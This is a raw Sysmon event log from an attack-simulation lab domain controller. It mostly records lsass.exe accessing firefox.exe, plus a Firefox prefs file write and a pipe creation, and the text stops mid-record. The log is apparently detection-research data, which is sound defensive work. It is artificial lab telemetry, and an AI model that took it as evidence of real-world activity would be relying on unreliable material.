Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.201{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000299710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 11:29:19.185{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.16.60670534C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000299709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.048{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A8F-6216-8707-000000003802}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.032{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1A8F-6216-8707-000000003802}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.032{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.032{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.032{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.032{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\S